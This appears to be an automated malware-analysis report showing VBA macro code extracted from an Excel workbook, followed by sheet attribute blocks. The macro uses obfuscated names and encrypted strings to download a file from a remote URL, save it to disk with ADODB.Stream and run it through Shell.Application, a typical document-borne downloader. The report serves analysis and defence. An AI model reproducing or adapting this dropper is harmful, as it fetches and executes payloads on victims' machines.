Dim ¸²·ª®µ¶¦¶¹¾¸¥°²°³¯ª¦¼««¢°³£¼ª¯·¤¢º¤¢·µ¥³®®´¸¿²½°¿¥º¥²¢¹¡¼³¹½º®¤¶º»¯¡¤¾¿´·¬§®µ³³²µ¤¡´¾¡¢¸²´¢ As Integer
Dim ¹¨º£¬¯¹©¿º¬¦¾¾·¢¾£µ½²¼´·©¾½¹ª¬²¾¢²¡¶¸¯¢¡µ»¸¦´¿¤¸´£¯©©©§¿»¿³ºº«©¨¬³»·£®¬°®«£´¿§¯¸
Dim ¤¡´¾¡¢¸²´¢½°¬¯¶¡»¶°¹¾µµ££½¬¥»¨»¦µ¼µ´¡»¹¨¼¬¨ª¤··«ª¥¹¢¿¦½®£³¤¿¼¼»¾¶²¶§¹°º¼½¹¨º£¬¯¹©¿º¬¦¾¾·¢¾£µ½²
¸²·ª®µ¶¦¶¹¾¸¥°²°³¯ª¦¼««¢°³£¼ª¯·¤¢º¤¢·µ¥³®®´¸¿²½°¿¥º¥²¢¹¡¼³¹½º®¤¶º»¯¡¤¾¿´·¬§®µ³³²µ¤¡´¾¡¢¸²´¢ = 1




Set ¹¨º£¬¯¹©¿º¬¦¾¾·¢¾£µ½²¼´·©¾½¹ª¬²¾¢²¡¶¸¯¢¡µ»¸¦´¿¤¸´£¯©©©§¿»¿³ºº«©¨¬³»·£®¬°®«£´¿§¯¸ = CreateObject("microsoft.xmlhttp")
Set »¶°¹¾µµ££½¬¥»¨»¦µ¼µ´¡»¹¨¼¬¨ª¤··«ª¥¹¢¿¦½®£³¤¿¼¼»¾¶²¶§¹°º¼½¹¨º£¬¯¹©¿º¬¦¾¾·¢¾£µ½²¼´·©¾½¹ª¬²¾¢²¡ = CreateObject("Shell.Application")

¹¨º£¬¯¹©¿º¬¦¾¾·¢¾£µ½²¼´·©¾½¹ª¬²¾¢²¡¶¸¯¢¡µ»¸¦´¿¤¸´£¯©©©§¿»¿³ºº«©¨¬³»·£®¬°®«£´¿§¯¸§·¶¨¼©½¯ = ASpecialPathA + ®´¸¿²½°¿¥º¥²¢¹¡¼³¹½º®¤¶º»¯¡¤¾¿´·¬§®µ³³²µ¤¡´¾¡¢¸²´¢½°¬¯¶¡»¶°¹¾µµ££½¬¥»¨»¦µ¼µ´¡»¹¨¼¬¨ª¤··«ª¥¹¢¿¦½®£³¤("\Mà¶ØGZ.ÂÛÂ")
¹¨º£¬¯¹©¿º¬¦¾¾·¢¾£µ½²¼´·©¾½¹ª¬²¾¢²¡¶¸¯¢¡µ»¸¦´¿¤¸´£¯©©©§¿»¿³ºº«©¨¬³»·£®¬°®«£´¿§¯¸.Open "get", ®´¸¿²½°¿¥º¥²¢¹¡¼³¹½º®¤¶º»¯¡¤¾¿´·¬§®µ³³²µ¤¡´¾¡¢¸²´¢½°¬¯¶¡»¶°¹¾µµ££½¬¥»¨»¦µ¼µ´¡»¹¨¼¬¨ª¤··«ª¥¹¢¿¦½®£³¤("hÖÖÓÕ://ÅlÒÀÖvÒÀÖÄÅ.ÜdÅÕ.ÂÙ/ÁÂÙkÂÅÔgÖÒÃÃÄÁÂÀÃÅmÒÃÃÄkÂÅÔgÖÂÔ/ÂÖwÂÖjkdÅgjÂdÃlkkÖgÂÔkÖgÅÂÔÖhÂÔgÔgÂÔgÂ/ÕÂÔÛÁvÂÔ1.ÂÛÂ"), False
¹¨º£¬¯¹©¿º¬¦¾¾·¢¾£µ½²¼´·©¾½¹ª¬²¾¢²¡¶¸¯¢¡µ»¸¦´¿¤¸´£¯©©©§¿»¿³ºº«©¨¬³»·£®¬°®«£´¿§¯¸.send
¡¤¾¿´·¬§®µ³³²µ¤¡´¾¡¢¸²´¢½°¬¯¶¡»¶°¹¾µµ££½¬¥»¨»¦µ¼µ´¡»¹¨¼¬¨ª¤··«ª¥¹¢¿¦½®£³¤¿¼¼»¾¶²¶§¹ = ¹¨º£¬¯¹©¿º¬¦¾¾·¢¾£µ½²¼´·©¾½¹ª¬²¾¢²¡¶¸¯¢¡µ»¸¦´¿¤¸´£¯©©©§¿»¿³ºº«©¨¬³»·£®¬°®«£´¿§¯¸.responseBody
If ¹¨º£¬¯¹©¿º¬¦¾¾·¢¾£µ½²¼´·©¾½¹ª¬²¾¢²¡¶¸¯¢¡µ»¸¦´¿¤¸´£¯©©©§¿»¿³ºº«©¨¬³»·£®¬°®«£´¿§¯¸.Status = 200 Then
Set °¯¨«¡£»§¸³°¸®¥¸²·ª®µ¶¦¶¹¾¸¥°²°³¯ª¦¼««¢°³£¼ª¯·¤¢º¤¢·µ¥³®®´¸¿²½°¿¥º¥²¢¹¡¼³¹½º®¤¶º»¯¡¤¾¿´·¬§®µ³³²µ = CreateObject("adodb.stream")
°¯¨«¡£»§¸³°¸®¥¸²·ª®µ¶¦¶¹¾¸¥°²°³¯ª¦¼««¢°³£¼ª¯·¤¢º¤¢·µ¥³®®´¸¿²½°¿¥º¥²¢¹¡¼³¹½º®¤¶º»¯¡¤¾¿´·¬§®µ³³²µ.Open
°¯¨«¡£»§¸³°¸®¥¸²·ª®µ¶¦¶¹¾¸¥°²°³¯ª¦¼««¢°³£¼ª¯·¤¢º¤¢·µ¥³®®´¸¿²½°¿¥º¥²¢¹¡¼³¹½º®¤¶º»¯¡¤¾¿´·¬§®µ³³²µ.Type = ¸²·ª®µ¶¦¶¹¾¸¥°²°³¯ª¦¼««¢°³£¼ª¯·¤¢º¤¢·µ¥³®®´¸¿²½°¿¥º¥²¢¹¡¼³¹½º®¤¶º»¯¡¤¾¿´·¬§®µ³³²µ¤¡´¾¡¢¸²´¢
°¯¨«¡£»§¸³°¸®¥¸²·ª®µ¶¦¶¹¾¸¥°²°³¯ª¦¼««¢°³£¼ª¯·¤¢º¤¢·µ¥³®®´¸¿²½°¿¥º¥²¢¹¡¼³¹½º®¤¶º»¯¡¤¾¿´·¬§®µ³³²µ.Write ¡¤¾¿´·¬§®µ³³²µ¤¡´¾¡¢¸²´¢½°¬¯¶¡»¶°¹¾µµ££½¬¥»¨»¦µ¼µ´¡»¹¨¼¬¨ª¤··«ª¥¹¢¿¦½®£³¤¿¼¼»¾¶²¶§¹
°¯¨«¡£»§¸³°¸®¥¸²·ª®µ¶¦¶¹¾¸¥°²°³¯ª¦¼««¢°³£¼ª¯·¤¢º¤¢·µ¥³®®´¸¿²½°¿¥º¥²¢¹¡¼³¹½º®¤¶º»¯¡¤¾¿´·¬§®µ³³²µ.SaveToFile ¹¨º£¬¯¹©¿º¬¦¾¾·¢¾£µ½²¼´·©¾½¹ª¬²¾¢²¡¶¸¯¢¡µ»¸¦´¿¤¸´£¯©©©§¿»¿³ºº«©¨¬³»·£®¬°®«£´¿§¯¸§·¶¨¼©½¯, ¸²·ª®µ¶¦¶¹¾¸¥°²°³¯ª¦¼««¢°³£¼ª¯·¤¢º¤¢·µ¥³®®´¸¿²½°¿¥º¥²¢¹¡¼³¹½º®¤¶º»¯¡¤¾¿´·¬§®µ³³²µ¤¡´¾¡¢¸²´¢ + ¸²·ª®µ¶¦¶¹¾¸¥°²°³¯ª¦¼««¢°³£¼ª¯·¤¢º¤¢·µ¥³®®´¸¿²½°¿¥º¥²¢¹¡¼³¹½º®¤¶º»¯¡¤¾¿´·¬§®µ³³²µ¤¡´¾¡¢¸²´¢
°¯¨«¡£»§¸³°¸®¥¸²·ª®µ¶¦¶¹¾¸¥°²°³¯ª¦¼««¢°³£¼ª¯·¤¢º¤¢·µ¥³®®´¸¿²½°¿¥º¥²¢¹¡¼³¹½º®¤¶º»¯¡¤¾¿´·¬§®µ³³²µ.Close
End If
»¶°¹¾µµ££½¬¥»¨»¦µ¼µ´¡»¹¨¼¬¨ª¤··«ª¥¹¢¿¦½®£³¤¿¼¼»¾¶²¶§¹°º¼½¹¨º£¬¯¹©¿º¬¦¾¾·¢¾£µ½²¼´·©¾½¹ª¬²¾¢²¡.Open (¹¨º£¬¯¹©¿º¬¦¾¾·¢¾£µ½²¼´·©¾½¹ª¬²¾¢²¡¶¸¯¢¡µ»¸¦´¿¤¸´£¯©©©§¿»¿³ºº«©¨¬³»·£®¬°®«£´¿§¯¸§·¶¨¼©½¯)
End Sub

 

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.